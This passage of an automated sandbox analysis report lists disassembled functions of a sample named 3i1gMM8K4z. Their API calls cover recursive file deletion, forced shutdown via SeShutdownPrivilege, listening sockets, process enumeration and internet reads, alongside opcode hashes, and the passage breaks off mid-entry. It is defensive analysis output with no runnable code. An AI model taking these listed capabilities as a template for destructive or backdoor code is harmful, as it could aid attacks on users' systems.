                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4104443479-0
                                                                                                                            • Opcode ID: a2895dc2a558d69fdb9fba5534730451fcded620af39317cd39f01002f174996
                                                                                                                            • Instruction ID: 7849f4c6414b195b017c2a23fa1afb525b5d19967810723b833f7dd2faff7720
                                                                                                                            • Opcode Fuzzy Hash: a2895dc2a558d69fdb9fba5534730451fcded620af39317cd39f01002f174996
                                                                                                                            • Instruction Fuzzy Hash: CE129971A0060DDBDF08DFA5D991AEEB7F5FF88310F10456AE906B7290EB35A910DB60
                                                                                                                            Function 00F43B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
                                                                                                                              • Part of subcall function 00F44A31: GetFileAttributesW.KERNEL32(?,00F4370B), ref: 00F44A32
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F43B89
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F43BD9
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F43BEA
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F43C01
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F43C0A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                            • Opcode ID: e3f5b6022915981e47f3e1bc59c4232b981de0fda242167ac3ce7b5cb760cb1c
                                                                                                                            • Instruction ID: f9e3f00722fde3b214c790978b9abe3ab1577158383b0974ccef2c2232ff118d
                                                                                                                            • Opcode Fuzzy Hash: e3f5b6022915981e47f3e1bc59c4232b981de0fda242167ac3ce7b5cb760cb1c
                                                                                                                            • Instruction Fuzzy Hash: 6431A37100C3899BC301EF64D8919AFBBE8BE95314F401D2DF9E6A2191EB21DA0CDB53
                                                                                                                            Function 00F451BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F3882B
                                                                                                                              • Part of subcall function 00F387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F38858
                                                                                                                              • Part of subcall function 00F387E1: GetLastError.KERNEL32 ref: 00F38865
                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00F451F9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                            • String ID: $@$SeShutdownPrivilege
                                                                                                                            • API String ID: 2234035333-194228
                                                                                                                            • Opcode ID: b5f1b26bdfee12029b9f682881499c3084238502e4432fb06f0cae4ed18a34cc
                                                                                                                            • Instruction ID: 1bd36aa6ab712cd7c7980166c44b8208542286a933e021c7838cfda84b80f179
                                                                                                                            • Opcode Fuzzy Hash: b5f1b26bdfee12029b9f682881499c3084238502e4432fb06f0cae4ed18a34cc
                                                                                                                            • Instruction Fuzzy Hash: 2A019E32B916152BFB283278AC8BFBB7A58DB04F60F240422FD13E20C3DAD45E01B590
                                                                                                                            Function 00F56283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F562DC
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00F562EB
                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00F56307
                                                                                                                            • listen.WSOCK32(00000000,00000005), ref: 00F56316
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00F56330
                                                                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00F56344
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279440585-0
                                                                                                                            • Opcode ID: cdbfe2680885c120e43f74d9941aec8679f30f141af8446a601c69f80527888c
                                                                                                                            • Instruction ID: ef486bbf123b6438a5334970ec8d5231b9a98396eed7cfcd3dcb95911b913ab1
                                                                                                                            • Opcode Fuzzy Hash: cdbfe2680885c120e43f74d9941aec8679f30f141af8446a601c69f80527888c
                                                                                                                            • Instruction Fuzzy Hash: 3D21C1316002089FCB00EF64DC45B6EB7E9EF44321F548168E926E73D2CBB0AC09EB51
                                                                                                                            Function 00EF5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F00DB6: std::exception::exception.LIBCMT ref: 00F00DEC
                                                                                                                              • Part of subcall function 00F00DB6: __CxxThrowException@8.LIBCMT ref: 00F00E01
                                                                                                                            • _memmove.LIBCMT ref: 00F30258
                                                                                                                            • _memmove.LIBCMT ref: 00F3036D
                                                                                                                            • _memmove.LIBCMT ref: 00F30414
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1300846289-0
                                                                                                                            • Opcode ID: c9b61448f389ba39a5624c945d67f2530331b15b01100088832ef83744fa9600
                                                                                                                            • Instruction ID: 90c81b9924631779bfc468bf35006b6de2215f0fa2dec2d03bd8d061180fddfc
                                                                                                                            • Opcode Fuzzy Hash: c9b61448f389ba39a5624c945d67f2530331b15b01100088832ef83744fa9600
                                                                                                                            • Instruction Fuzzy Hash: 6202D171A00209DBCF04DF68D991ABE7BF5EF44310F14806AE90AEB295EF35D950EB91
                                                                                                                            Function 00EE1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00EE19FA
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00EE1A4E
                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00EE1A61
                                                                                                                              • Part of subcall function 00EE1290: DefDlgProcW.USER32(?,00000020,?), ref: 00EE12D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ColorProc$LongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3744519093-0
                                                                                                                            • Opcode ID: a05153b2284508ad345b79e71fa11c0e25917b071a69964f851a86d5960dbfdc
                                                                                                                            • Instruction ID: 7d5ae77faafd856815804df218105419622123c7f529e0362010a59ae31eb91d
                                                                                                                            • Opcode Fuzzy Hash: a05153b2284508ad345b79e71fa11c0e25917b071a69964f851a86d5960dbfdc
                                                                                                                            • Instruction Fuzzy Hash: EFA189B01025CCFAD628AB2B8C44EFF359CDF42395B14116EF542F6196CA399DC1B2B2
                                                                                                                            Function 00F4BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F4BCE6
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4BD16
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4BD2B
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F4BD3C
                                                                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F4BD6C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2387731787-0
                                                                                                                            • Opcode ID: 4adcc1058ee8de7b770b611a7fe7e8269a04276278764ada14cd933477d8e3c5
                                                                                                                            • Instruction ID: 4fb9208841fc7cdbf3fe7292d26c7939dc10d4055e06770457eb4854eda2c358
                                                                                                                            • Opcode Fuzzy Hash: 4adcc1058ee8de7b770b611a7fe7e8269a04276278764ada14cd933477d8e3c5
                                                                                                                            • Instruction Fuzzy Hash: 4551AD75A046029FC718DF68D890EAAB7F8EF49324F04455DE9568B3A2DB30ED04EB91
                                                                                                                            Function 00F56747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F57D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F57DB6
                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F5679E
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00F567C7
                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00F56800
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00F5680D
                                                                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00F56821
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 99427753-0
                                                                                                                            • Opcode ID: 6cf79cbcae66b5b6f5ebf23dbc8186b33317458b2b64ffad16d3c1e6ac2e8ea5
                                                                                                                            • Instruction ID: dc56dd3adce3065695d1f90e38f1e2f1789eae52201cc814f0bc0b27878998e7
                                                                                                                            • Opcode Fuzzy Hash: 6cf79cbcae66b5b6f5ebf23dbc8186b33317458b2b64ffad16d3c1e6ac2e8ea5
                                                                                                                            • Instruction Fuzzy Hash: 7C41D475A002086FDB10BF259C86F2E77E8DF49724F448468FA59BB3D3CA709D049792
                                                                                                                            Function 00F65376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 292994002-0
                                                                                                                            • Opcode ID: 073b22231678ad4268a7a5f375a88e0e5d9c682a7fcabd18a677fd56d0077948
                                                                                                                            • Instruction ID: aa24c16aa1b98cc638c26f0f69c59d9e54a48593de160934da284cedf7c7577c
                                                                                                                            • Opcode Fuzzy Hash: 073b22231678ad4268a7a5f375a88e0e5d9c682a7fcabd18a677fd56d0077948
                                                                                                                            • Instruction Fuzzy Hash: 5511B2327009156BDB215F26DC45A6B7BD9FF45BA1F444029F846E7251CBB0DC01A6A4
                                                                                                                            Function 00F380A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F380C0
                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F380CA
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F380D9
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F380E0
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F380F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 44706859-0
                                                                                                                            • Opcode ID: 47bb84bbc3aaab419376c99d1d870ec7df56c5d81939e59537e6141d3bdb7594
                                                                                                                            • Instruction ID: 2bd40009f5cdbbc692a83b18e7024fbdf69b5f03a7f7a04bbaf415c7be7aecec
                                                                                                                            • Opcode Fuzzy Hash: 47bb84bbc3aaab419376c99d1d870ec7df56c5d81939e59537e6141d3bdb7594
                                                                                                                            • Instruction Fuzzy Hash: 92F06271244308BFEB101FA5EC8DE673BACFF8A7A5F000025F955C6150CBA59C46FA60
                                                                                                                            Function 00EE4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4AD0), ref: 00EE4B45
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EE4B57
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                            • API String ID: 2574300362-192647395
                                                                                                                            • Opcode ID: 897dcc255c33e8aa7af93b964e80ceea64a60038bb351cb49af551146acbaf19
                                                                                                                            • Instruction ID: 805da18b61a0c708a4423e73309299b84411e2552424b488bd55479a7ab531ed
                                                                                                                            • Opcode Fuzzy Hash: 897dcc255c33e8aa7af93b964e80ceea64a60038bb351cb49af551146acbaf19
                                                                                                                            • Instruction Fuzzy Hash: A4D0C770E00B1BCFC7208F32F828B0272E4AF42388B10983AD492E2190E6B0E884DA14
                                                                                                                            Function 00F5EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00F5EE3D
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00F5EE4B
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00F5EF0B
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F5EF1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2576544623-0
                                                                                                                            • Opcode ID: 8c93ba888c4d35448de5496fe2c3433d70e5fffc95d7ccb0c53d1742d75b186b
                                                                                                                            • Instruction ID: 7aae6b35014811c809e256ef67713b65ebc52122f388435d8e74599c7ed4b2c4
                                                                                                                            • Opcode Fuzzy Hash: 8c93ba888c4d35448de5496fe2c3433d70e5fffc95d7ccb0c53d1742d75b186b
                                                                                                                            • Instruction Fuzzy Hash: 425191715083499FD314EF25DC82E6BB7E8EF94750F00582DF995972A2EB70AD08CB92
                                                                                                                            Function 00F3E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F3E628
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen
                                                                                                                            • String ID: ($|
                                                                                                                            • API String ID: 1659193697-1631851259
                                                                                                                            • Opcode ID: f6eba11d2e4d3d07023172d95b28322f12a9a569668ae4bda319e13577414d0e
                                                                                                                            • Instruction ID: e66d5b6d405da2c0c569b609202050336b050b9f5f292601064ceae7eb035c66
                                                                                                                            • Opcode Fuzzy Hash: f6eba11d2e4d3d07023172d95b28322f12a9a569668ae4bda319e13577414d0e
                                                                                                                            • Instruction Fuzzy Hash: 67321475A00605DFDB28CF19C481AAAB7F1FF48320B15C56EE89ADB3A1DB70E941DB40
                                                                                                                            Function 00F522EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F5180A,00000000), ref: 00F523E1
                                                                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F52418
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 599397726-0
                                                                                                                            • Opcode ID: 28e70025442e31ffe12ff2a3fa9b02d13fa946fd536268027a72fc0b6eabf0d5
                                                                                                                            • Instruction ID: 729d5256ecf91468e4c0bccaf737fe05b99f86925dc87d831ee6a7c1e03dbc90
                                                                                                                            • Opcode Fuzzy Hash: 28e70025442e31ffe12ff2a3fa9b02d13fa946fd536268027a72fc0b6eabf0d5
                                                                                                                            • Instruction Fuzzy Hash: E841F672904209BFEB50DE95DC81FBF77ACEB42326F10412AFF01A6141DA749E49B660
                                                                                                                            Function 00F4B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F4B40B
                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F4B465
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F4B4B2
                                                                                                                            Memory Dump Source
